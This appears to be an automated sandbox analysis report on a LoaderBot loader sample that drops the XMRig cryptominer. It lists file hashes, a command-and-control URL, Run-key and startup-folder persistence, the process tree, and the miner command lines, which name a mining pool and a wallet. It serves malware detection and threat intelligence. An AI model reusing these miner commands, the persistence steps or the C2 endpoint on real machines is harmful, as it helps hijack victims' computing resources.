loaderbot | 9a4c96b227213b7049f851572487d42c994220bbf584f631bf347a507b684c1a

Analysis

max time kernel
149s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
23-06-2024 09:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9a4c96b227213b7049f851572487d42c994220bbf584f631bf347a507b684c1a.exe
Size

4.8MB
MD5

1fecbc51b5620e578c48a12ebeb19bc2
SHA1

94fe551f4fb3ff76a0be99a962dc20fc2656453e
SHA256

9a4c96b227213b7049f851572487d42c994220bbf584f631bf347a507b684c1a
SHA512

ede6f39946562e253fcafe225292db32ba30f9476557304ae1769830e3a46c660920c304ca42d52544411e41acfc1bf206c829c98d61948cb595b1fa0105e2d7
SSDEEP

98304:6qwWqwfM8jZlts7Dnfg+u5NIg1GbnBH9Ltl4NFA0kA8X1KpWQMg:6qwWqw0v7DnZu5NnobnDtl4TjZ8X1/Qf

Score

10^/10

loaderbot xmrig loader miner persistence

Malware Config

Extracted

Family

loaderbot

https://cv99160.tw1.ru/cmd.php

Signatures

LoaderBot
LoaderBot is a loader written in .NET downloading and executing miners.
loader miner loaderbot
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
LoaderBot executable 2 IoCs

Processes:

resource yara_rule

C:\Users\Admin\AppData\Local\Temp\RarSFX1\yondex.exe loaderbot
behavioral1/memory/3404-22-0x0000000000020000-0x000000000041E000-memory.dmp loaderbot

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX1\yondex.exe	loaderbot
behavioral1/memory/3404-22-0x0000000000020000-0x000000000041E000-memory.dmp	loaderbot

XMRig Miner payload 16 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/4932-39-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/2168-43-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1984-46-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1984-47-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1984-48-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1984-49-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1984-50-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1984-51-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1984-52-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1984-53-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1984-54-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1984-55-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1984-56-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1984-57-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1984-58-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig
behavioral1/memory/1984-59-0x0000000140000000-0x0000000140B75000-memory.dmp	xmrig

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

9a4c96b227213b7049f851572487d42c994220bbf584f631bf347a507b684c1a.exerolex.exeyondex.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	9a4c96b227213b7049f851572487d42c994220bbf584f631bf347a507b684c1a.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	rolex.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	yondex.exe

Drops startup file 1 IoCs

Processes:

yondex.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url yondex.exe
Executes dropped EXE 5 IoCs

Processes:

rolex.exeyondex.exeDriver.exeDriver.exeDriver.exe

pid process

2452 rolex.exe
3404 yondex.exe
4932 Driver.exe
2168 Driver.exe
1984 Driver.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Driver.url	yondex.exe

pid	process
2452	rolex.exe
3404	yondex.exe
4932	Driver.exe
2168	Driver.exe
1984	Driver.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

yondex.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Driver = "C:\\Users\\Admin\\AppData\\Roaming\\Sysfiles\\yondex.exe"	yondex.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

yondex.exe

pid	process
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe
3404	yondex.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

yondex.exeDriver.exeDriver.exe

description	pid	process
Token: SeDebugPrivilege	3404	yondex.exe
Token: SeLockMemoryPrivilege	4932	Driver.exe
Token: SeLockMemoryPrivilege	4932	Driver.exe
Token: SeLockMemoryPrivilege	1984	Driver.exe
Token: SeLockMemoryPrivilege	1984	Driver.exe

Suspicious use of WriteProcessMemory 13 IoCs

Processes:

9a4c96b227213b7049f851572487d42c994220bbf584f631bf347a507b684c1a.execmd.exerolex.exeyondex.exe

description	pid	process	target process
PID 320 wrote to memory of 2300	320	9a4c96b227213b7049f851572487d42c994220bbf584f631bf347a507b684c1a.exe	cmd.exe
PID 320 wrote to memory of 2300	320	9a4c96b227213b7049f851572487d42c994220bbf584f631bf347a507b684c1a.exe	cmd.exe
PID 2300 wrote to memory of 2452	2300	cmd.exe	rolex.exe
PID 2300 wrote to memory of 2452	2300	cmd.exe	rolex.exe
PID 2452 wrote to memory of 3404	2452	rolex.exe	yondex.exe
PID 2452 wrote to memory of 3404	2452	rolex.exe	yondex.exe
PID 2452 wrote to memory of 3404	2452	rolex.exe	yondex.exe
PID 3404 wrote to memory of 4932	3404	yondex.exe	Driver.exe
PID 3404 wrote to memory of 4932	3404	yondex.exe	Driver.exe
PID 3404 wrote to memory of 2168	3404	yondex.exe	Driver.exe
PID 3404 wrote to memory of 2168	3404	yondex.exe	Driver.exe
PID 3404 wrote to memory of 1984	3404	yondex.exe	Driver.exe
PID 3404 wrote to memory of 1984	3404	yondex.exe	Driver.exe

C:\Users\Admin\AppData\Local\Temp\9a4c96b227213b7049f851572487d42c994220bbf584f631bf347a507b684c1a.exe
"C:\Users\Admin\AppData\Local\Temp\9a4c96b227213b7049f851572487d42c994220bbf584f631bf347a507b684c1a.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:2300

C:\Users\Admin\AppData\Local\Temp\RarSFX0\rolex.exe
rolex.exe -priverdD
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2452

C:\Users\Admin\AppData\Local\Temp\RarSFX1\yondex.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\yondex.exe"
4⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3404

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4932

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
5⤵
- Executes dropped EXE
PID:2168

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1984

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat
Filesize
36B

MD5
ce32eea7c273547d3fb75f8e4191e25a

SHA1
07d0edd1f64c799b01da4e670126b4b2c5091dde

SHA256
940d3c2d3a6665d5017c0bf64120a71b2ce61106ae015399282ae8f4656cb91f

SHA512
56da0be9e79b98fb276a6d5a26b2fe06035d46e299fc6e6cb4e04bb396d119204881518e93f2184a68aa34ff024f81281f131ff0f98cf39541cf857c96da95d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\rolex.exe
Filesize
4.4MB

MD5
8866d677a3309a0ad903f37557c5941b

SHA1
2b03d0c6cb74defedfc31154c57b073c889ea11a

SHA256
ecbccacd00cdf38870bea7d203909da1ea2261477125ff7e0bdcef5f3fc4d17d

SHA512
15535e08a5e224941610c90f0ba3921bb3a1911380889d393aedbc2e4806910171c81005cda27d23466292daec606abcb94d0fbf546430d70ea21de15cfe406e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\yondex.exe
Filesize
4.0MB

MD5
bd2413c32e34d0031f7881d51ae731ff

SHA1
8771733c460f22adc0e1865f0b3f2ac19e9c1001

SHA256
277e5a809506398685fe20ba674b7f3f75b2e04a34c2b150a84088b266138894

SHA512
612c8b9f86308b13342cef00b9166084bf36f44addd139a0123f84cf9711fb2f03e15e4a0b3d95a6deaafb60bca1cc1436514b2b96f4aaf18b094534c94974cf

Download Submit
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
Filesize
3.9MB

MD5
02569a7a91a71133d4a1023bf32aa6f4

SHA1
0f16bcb3f3f085d3d3be912195558e9f9680d574

SHA256
8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

SHA512
534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

Download Submit
memory/1984-54-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1984-53-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1984-59-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1984-58-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1984-57-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1984-56-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1984-46-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1984-47-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1984-48-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1984-49-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1984-50-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1984-51-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1984-52-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/1984-55-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/2168-43-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/3404-22-0x0000000000020000-0x000000000041E000-memory.dmp

Filesize
4.0MB

Download
memory/3404-25-0x00000000050B0000-0x0000000005116000-memory.dmp

Filesize
408KB

Download
memory/4932-39-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download
memory/4932-37-0x0000000001FB0000-0x0000000001FC4000-memory.dmp

Filesize
80KB

Download
memory/4932-36-0x0000000140000000-0x0000000140B75000-memory.dmp

Filesize
11.5MB

Download